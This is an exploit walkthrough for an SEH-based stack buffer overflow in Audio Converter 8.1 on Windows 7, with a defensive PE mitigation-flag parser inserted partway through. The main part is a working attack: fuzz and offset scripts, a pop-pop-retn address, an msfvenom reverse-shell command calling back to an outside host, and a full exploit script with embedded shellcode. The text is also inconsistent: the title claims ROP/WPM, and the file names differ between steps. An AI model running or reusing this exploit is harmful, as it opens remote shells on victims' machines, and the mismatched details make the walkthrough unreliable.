Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM Walkthrough

reference: Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
os name: Microsoft Windows 7 Professional
os version: 6.1.7601 Service Pack 1 Build 7601
system type: x86-based PC

fuzz

omitted to save time

exploit.py
# Fuzz file: 50000 bytes of "A" written as a .wav to trigger the crash
payload = b"A" * 50000

with open("exploit.wav", "wb") as fp:
    fp.write(payload)

offset

omitted

exploit.py
# Offset check: 4436 bytes of filler, then "BBBB" to confirm what lands in the overwritten slot
payload = b"A" * 4436
payload += b"BBBB"
payload += b"C" * (50000 - 4436 - 4)

with open("exploit.wav", "wb") as fp:
    fp.write(payload)

badchar

omitted

Exclude "\x00\x0a\x3d" as bad characters.

return address

seh

Use !mona seh to search for a pop-pop-retn gadget:

audconv.dll is not ASLR enabled:

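The handler address above is usable only because audconv.dll is loaded without ASLR. The following is an added example, not code from the original walkthrough: a small PE header parser that reports the DllCharacteristics mitigation flags (DYNAMIC_BASE for ASLR, NX_COMPAT for DEP, NO_SEH) so a defender can inventory which modules an application loads without these protections. The image it parses is a constructed header-only stub built by build_stub_pe; the flag values and header offsets come from the PE/COFF specification, and report() can be pointed at real files on disk.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flags from the PE/COFF specification
HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high-entropy image base
DYNAMIC_BASE = 0x0040     # image opted in to ASLR
NX_COMPAT = 0x0100        # image opted in to DEP
NO_SEH = 0x0400           # image declares that it uses no SEH handlers


def pe_mitigations(data: bytes) -> dict:
    """Parse the DOS, COFF and optional headers and return the mitigation flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    (_machine, _nsec, _ts, _psym, _nsym, _opt_size,
     characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20  # COFF file header is 20 bytes
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 of the optional header for both PE32 and PE32+
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    return {
        "is_dll": bool(characteristics & 0x2000),
        "pe32plus": magic == 0x20B,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        "high_entropy_va": bool(dll_chars & HIGH_ENTROPY_VA),
    }


def build_stub_pe(dll_characteristics: int, pe32plus: bool = False) -> bytes:
    """Constructed sample: a header-only DLL image with no sections, enough to parse."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature right after the DOS header
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,  # Machine
                       0, 0, 0, 0,                      # sections, timestamp, symbols
                       opt_size,
                       0x2102)                          # DLL | 32BIT_MACHINE | EXECUTABLE_IMAGE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def report(path: str) -> dict:
    """Read a PE file from disk and return its mitigation flags."""
    with open(path, "rb") as fp:
        return pe_mitigations(fp.read())


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, report(p))
```

Run it over the DLLs shipped with an application (python pe_mitigations.py audconv.dll ...) to list modules that report aslr False; those are the modules whose addresses stay fixed across reboots. Note that SafeSEH status lives in the load config directory rather than in DllCharacteristics, so NO_SEH here only reflects the image's declaration, not a SafeSEH table.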
shellcode

1st stage

jmp short forward into the (50000-4436-4)-byte region that follows the handler:

2nd stage

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x3d"

exploit.py

shellcode =  b""
shellcode += b"\xba\x9b\x45\xac\xa0\xda\xca\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12"
shellcode += b"\x83\x75\xb9\x4e\x55\x75\xaa\x0d\x96\x85\x2b"
shellcode += b"\x72\x1e\x60\x1a\xb2\x44\xe1\x0d\x02\x0e\xa7"
shellcode += b"\xa1\xe9\x42\x53\x31\x9f\x4a\x54\xf2\x2a\xad"
shellcode += b"\x5b\x03\x06\x8d\xfa\x87\x55\xc2\xdc\xb6\x95"
shellcode += b"\x17\x1d\xfe\xc8\xda\x4f\x57\x86\x49\x7f\xdc"
shellcode += b"\xd2\x51\xf4\xae\xf3\xd1\xe9\x67\xf5\xf0\xbc"
shellcode += b"\xfc\xac\xd2\x3f\xd0\xc4\x5a\x27\x35\xe0\x15"
shellcode += b"\xdc\x8d\x9e\xa7\x34\xdc\x5f\x0b\x79\xd0\xad"
shellcode += b"\x55\xbe\xd7\x4d\x20\xb6\x2b\xf3\x33\x0d\x51"
shellcode += b"\x2f\xb1\x95\xf1\xa4\x61\x71\x03\x68\xf7\xf2"
shellcode += b"\x0f\xc5\x73\x5c\x0c\xd8\x50\xd7\x28\x51\x57"
shellcode += b"\x37\xb9\x21\x7c\x93\xe1\xf2\x1d\x82\x4f\x54"
shellcode += b"\x21\xd4\x2f\x09\x87\x9f\xc2\x5e\xba\xc2\x8a"
shellcode += b"\x93\xf7\xfc\x4a\xbc\x80\x8f\x78\x63\x3b\x07"
shellcode += b"\x31\xec\xe5\xd0\x36\xc7\x52\x4e\xc9\xe8\xa2"
shellcode += b"\x47\x0e\xbc\xf2\xff\xa7\xbd\x98\xff\x48\x68"
shellcode += b"\x0e\xaf\xe6\xc3\xef\x1f\x47\xb4\x87\x75\x48"
shellcode += b"\xeb\xb8\x76\x82\x84\x53\x8d\x45\x6b\x0b\x8c"
shellcode += b"\xcc\x03\x4e\x8e\xef\x68\xc7\x68\x85\x9e\x8e"
shellcode += b"\x23\x32\x06\x8b\xbf\xa3\xc7\x01\xba\xe4\x4c"
shellcode += b"\xa6\x3b\xaa\xa4\xc3\x2f\x5b\x45\x9e\x0d\xca"
shellcode += b"\x5a\x34\x39\x90\xc9\xd3\xb9\xdf\xf1\x4b\xee"
shellcode += b"\x88\xc4\x85\x7a\x25\x7e\x3c\x98\xb4\xe6\x07"
shellcode += b"\x18\x63\xdb\x86\xa1\xe6\x67\xad\xb1\x3e\x67"
shellcode += b"\xe9\xe5\xee\x3e\xa7\x53\x49\xe9\x09\x0d\x03"
shellcode += b"\x46\xc0\xd9\xd2\xa4\xd3\x9f\xda\xe0\xa5\x7f"
shellcode += b"\x6a\x5d\xf0\x80\x43\x09\xf4\xf9\xb9\xa9\xfb"
shellcode += b"\xd0\x79\xd9\xb1\x78\x2b\x72\x1c\xe9\x69\x1f"
shellcode += b"\x9f\xc4\xae\x26\x1c\xec\x4e\xdd\x3c\x85\x4b"
shellcode += b"\x99\xfa\x76\x26\xb2\x6e\x78\x95\xb3\xba"


# badchars: \x00\x0a\x3d
# filler up to the next-SEH slot (4436 = 4432 + 4-byte nSEH)
payload = b"A" * 4432
# nSEH: jmp short +6 over the handler address into the NOP sled
payload += b"\xeb\x06\x41\x41"
# SEH handler: pop-pop-retn in audconv.dll 0x1003f4e6 (little-endian, not ASLR enabled)
payload += b"\xe6\xf4\x03\x10"
# NOP sled, then the 2nd-stage shellcode
payload += b"\x90" * 16
payload += shellcode
# pad to the 50000-byte size used during fuzzing (50000 - 4440 - 16 = 45544)
payload += b"C" * (45544 - len(shellcode))

with open("exploit.pls", "wb") as fp:
    fp.write(payload)

proof

Audio Converter: File->Add Playlist..., choose exploit.wav.